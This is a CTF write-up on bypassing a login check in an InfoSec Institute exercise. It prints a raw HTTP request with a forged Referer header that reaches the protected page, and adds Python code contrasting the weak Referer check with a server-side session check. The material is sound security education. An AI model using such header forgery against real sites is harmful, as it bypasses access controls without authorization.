Description: It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in.
Vulnerability: OWASP A7 Missing Function Level Access Control
You need to modify the HTTP_REFERER.
You need to make it look as if the login page redirected you to exercise 5's page.
Based on the OWASP description, A7 Missing Function Level Access Control is: “Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.” So the basic idea is to forge a URL to reach the hidden pages.
The web page has a Login button that cannot be clicked, so I checked the source code and found:
<p class="lead">You are not logged in. Please <a class="btn btn-sm btn-info" disabled href="login.html">login</a> to access this page.</p>
There is a login.html link, but it is disabled, so I tried to access it directly.
Then I intercepted the request with Burp; the Referer header was missing, so I sent the request to Repeater and added a Referer line to the headers.
GET /ctf2/exercises/ex5.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html
Cookie: _ga=GA1.2.2097500748.1426146732; visitor_id12882=197992830; __distillery=v20150227_3d92622f-8940-44b8-8c2e-fbfba9e66052; __utma=192755314.2097500748.1426146732.1427136730.1427302672.2; __utmz=192755314.1427136730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9okprgbh057f1bg5jqjal83sq3
Connection: keep-alive
This got me to level 6, so the bypass is not forging the URL but adding the Referer header: the page treats a Referer pointing at login.html as proof that the login page sent me there, instead of checking the session on every request.
What about bypassing it directly in the browser? After looking for a while for a Firefox add-on, I used the HackBar add-on, which lets me add the Referer header to the request.
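To make the root cause concrete, here is an added example (my own code, not the challenge's PHP or anything from the original writeup) that models the two ways ex5.php could decide whether to render: the weak check that only compares the Referer header against the login page, and a session-based check that looks the session cookie up server-side on every request. The session store, the "alice" session and the sample request headers are constructed for this example; the login URL and the PHPSESSID value are the ones shown in the writeup's request above.

```python
"""
Added example, not part of the original writeup: why a Referer-based
check is not access control, and what the server-side check should be.
"""
from typing import Callable, Dict, Optional

# URL from the writeup's captured request
LOGIN_PAGE = "http://ctf.infosecinstitute.com/ctf2/exercises/login.html"

# Constructed server-side session store: session id -> logged-in user, or None
# when the session exists but nobody has authenticated on it.
SESSIONS: Dict[str, Optional[str]] = {
    "9okprgbh057f1bg5jqjal83sq3": None,        # PHPSESSID from the writeup, never logged in
    "constructed-session-for-alice": "alice",  # constructed authenticated session
}


def parse_cookie(header: str) -> Dict[str, str]:
    """Split a Cookie header ('a=1; b=2') into a name -> value dict."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def referer_check(headers: Dict[str, str]) -> bool:
    """Weak check: 'the login page sent you here' is taken to mean 'logged in'.
    The client controls Referer, so anyone can satisfy this."""
    return headers.get("Referer", "") == LOGIN_PAGE


def session_check(headers: Dict[str, str]) -> bool:
    """Proper check: resolve the session cookie server-side on every request
    and require an authenticated user bound to that session."""
    sid = parse_cookie(headers.get("Cookie", "")).get("PHPSESSID")
    return sid is not None and SESSIONS.get(sid) is not None


def serve_ex5(headers: Dict[str, str], check: Callable[[Dict[str, str]], bool]) -> int:
    """Return the HTTP status the protected page answers with under a given check:
    200 renders the page, 302 would redirect back to login."""
    return 200 if check(headers) else 302


# Constructed requests modelled on the writeup's capture
UNAUTH_NO_REFERER = {"Cookie": "_ga=GA1.2.1; PHPSESSID=9okprgbh057f1bg5jqjal83sq3"}
UNAUTH_WITH_REFERER = {**UNAUTH_NO_REFERER, "Referer": LOGIN_PAGE}
LOGGED_IN = {"Cookie": "PHPSESSID=constructed-session-for-alice"}

if __name__ == "__main__":
    cases = [
        ("no referer, not logged in", UNAUTH_NO_REFERER),
        ("forged referer, not logged in", UNAUTH_WITH_REFERER),
        ("no referer, logged in", LOGGED_IN),
    ]
    for label, hdrs in cases:
        print(f"{label:32s} referer_check={serve_ex5(hdrs, referer_check)} "
              f"session_check={serve_ex5(hdrs, session_check)}")
```

Run as a script it prints a status per case under each check; the second row is the writeup's bypass (200 under the Referer check, 302 under the session check). Note that the session check never consults the Referer at all: the fix is not a stricter Referer comparison but performing the same server-side authorization on every request to the protected page, as the OWASP text quoted above says.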
Resources and Tools:
1. OWASP A7 Missing Function Level Access Control – https://github.com/OWASP/railsgoat/wiki/A7-Missing-Function-Level-Access-Control–%28Admin-Controller%29
2. Burp Suite
3. HackBar Firefox Add-on – https://addons.mozilla.org/en-US/firefox/addon/hackbar/